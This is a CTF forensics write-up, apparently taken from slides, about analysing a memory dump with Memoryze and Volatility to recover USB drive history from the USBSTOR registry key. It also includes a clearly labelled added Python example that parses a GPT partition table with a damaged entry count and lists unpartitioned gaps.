Analysis: This level was all about memory dump investigation. As usual I had to look up Google to find some memory dump analysis tool. I came across Memoryze and Audit Viewer. I installed them and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a wizard, which I followed accordingly. After a while I got the results in a simply formatted way. I tried going through the windows but couldn't find anything much relevant, and ended up getting only the last flag.
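Returning to Forensics Level 4: the steps there (read the header at LBA 1, patch the partition-entry count that the damaged header reports as 00, parse the entries, sort them by starting LBA and read off the gaps) can be automated once the GPT layout from the Wikipedia page is known. Below is an added Python example, not the author's GPTparser.pl run and not derived from the CTF's image.dd; the disk image is constructed in-code with the CRC32 fields left zero, the partition LBA ranges are made up, and the type-GUID table holds just two well-known entries.

```python
import struct
import uuid

SECTOR = 512  # the challenge description states 512-byte LBAs

# GPT header fields at LBA 1, per the layout the writeup takes from Wikipedia
ENTRIES_LBA_OFF = 72   # starting LBA of the partition entry array (8 bytes)
NUM_ENTRIES_OFF = 80   # number of partition entries (4 bytes)
ENTRY_SIZE_OFF = 84    # size of a single entry, normally 128 (4 bytes)

# Two well-known partition type GUIDs (a small subset of the Wikipedia table)
TYPE_GUIDS = {
    "EBD0A0A2-B9E5-4433-87C0-68B6B72699C7": "Microsoft basic data",
    "0FC63DAF-8483-4772-8E79-3D69D8477DE4": "Linux filesystem data",
}


def build_sample_image(parts, num_entries_field=None):
    """Constructed image: zeroed protective MBR (LBA 0), GPT header (LBA 1),
    partition entries from LBA 2.  parts = [(first_lba, last_lba), ...].
    num_entries_field, if given, is written instead of the real count, to mimic
    the damaged header in the challenge.  CRC32 fields are left zero."""
    entry_size = 128
    count = len(parts) if num_entries_field is None else num_entries_field
    header = bytearray(SECTOR)
    header[0:8] = b"EFI PART"
    struct.pack_into("<I", header, 8, 0x00010000)          # revision 1.0
    struct.pack_into("<I", header, 12, 92)                 # header size
    struct.pack_into("<Q", header, 24, 1)                  # current LBA
    struct.pack_into("<Q", header, ENTRIES_LBA_OFF, 2)     # entry array at LBA 2
    struct.pack_into("<I", header, NUM_ENTRIES_OFF, count)
    struct.pack_into("<I", header, ENTRY_SIZE_OFF, entry_size)
    entries = bytearray(entry_size * len(parts))
    basic_data = uuid.UUID("EBD0A0A2-B9E5-4433-87C0-68B6B72699C7")
    for i, (first, last) in enumerate(parts):
        off = i * entry_size
        entries[off:off + 16] = basic_data.bytes_le                 # type GUID
        entries[off + 16:off + 32] = uuid.UUID(int=i + 1).bytes_le  # unique GUID
        struct.pack_into("<QQ", entries, off + 32, first, last)     # first/last LBA
        name = f"part{i}".encode("utf-16-le")
        entries[off + 56:off + 56 + len(name)] = name
    image = bytes(SECTOR) + bytes(header) + bytes(entries)
    return image + bytes((-len(image)) % SECTOR)  # pad to a whole sector


def parse_gpt(image, override_count=None):
    """Parse the GPT header at LBA 1 and its entry array; override_count plays the
    role of the hex edit in step 5 (trust our own count, not the damaged header).
    Returns the used entries sorted by starting LBA."""
    hdr = image[SECTOR:2 * SECTOR]
    if hdr[:8] != b"EFI PART":
        raise ValueError("no GPT signature at LBA 1")
    entries_lba, = struct.unpack_from("<Q", hdr, ENTRIES_LBA_OFF)
    count, = struct.unpack_from("<I", hdr, NUM_ENTRIES_OFF)
    entry_size, = struct.unpack_from("<I", hdr, ENTRY_SIZE_OFF)
    if override_count is not None:
        count = override_count
    parts = []
    base = entries_lba * SECTOR
    for i in range(count):
        ent = image[base + i * entry_size:base + (i + 1) * entry_size]
        if len(ent) < entry_size:
            break  # ran off the end of the (truncated) image
        type_guid = uuid.UUID(bytes_le=ent[0:16])
        if type_guid.int == 0:
            continue  # unused slot
        first, last = struct.unpack_from("<QQ", ent, 32)
        name = ent[56:128].decode("utf-16-le").rstrip("\x00")
        guid = str(type_guid).upper()
        parts.append({"type": TYPE_GUIDS.get(guid, guid), "first_lba": first,
                      "last_lba": last, "name": name})
    return sorted(parts, key=lambda p: p["first_lba"])


def unpartitioned_gaps(parts):
    """Inclusive LBA ranges lying between consecutive (sorted) partitions."""
    gaps = []
    for a, b in zip(parts, parts[1:]):
        if b["first_lba"] > a["last_lba"] + 1:
            gaps.append((a["last_lba"] + 1, b["first_lba"] - 1))
    return gaps


if __name__ == "__main__":
    # Constructed, deliberately out-of-order layout with a hole before the second partition
    layout = [(2048, 206847), (411648, 1024000), (208896, 411647)]
    img = build_sample_image(layout, num_entries_field=0)  # damaged header says 0 entries
    print("as the header claims:", parse_gpt(img))
    fixed = parse_gpt(img, override_count=3)
    for p in fixed:
        print(p)
    print("unpartitioned:", unpartitioned_gaps(fixed))
```

With the header's count trusted the parser reports no partitions at all, which is the situation the writeup hit before its hex edit; passing the corrected count recovers the entries, and sorting by starting LBA is what makes the gap computation meaningful.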
  • 36. I again went through the various links and came across a tool named Volatility. I installed it and played with it for a while. With the following working steps I got the rest of the flags:
1. I tried to locate the registry hive where we could find the external drive information.
2. The second-last registry hive was supposed to store all the drive information.
3. I dumped the second-last hive and got a very long list of registry information.
4. The challenge was to look for the external drive information. I went through a few analysis articles and found that the USBSTOR key stores the external USB drive information.
5. Hence I ended up with the following command and got the result successfully.
  • 37. 6. But still the flag was not complete: the page source revealed that the expected time must be in IST, hence we had to add +5:30 to the times when the drive was first connected and last disconnected.
Flag:
Finally, Near The End, A Few Words:
- All the links and tools mentioned above were functioning at the time of this write-up, and I cannot assume they will keep working.
- I apologize for any grammatical mistakes or for my poor English.
- The ideas mentioned above are my own and may differ from yours.
- I completely agree with the fact that there may be much better ways to solve the above challenges, but eventually my ideas worked out.
- Wish Happy Hacking to Everyone.
- End. Regards To All The Members of NULL.
The epic story ends here….. ~$-THE END-$~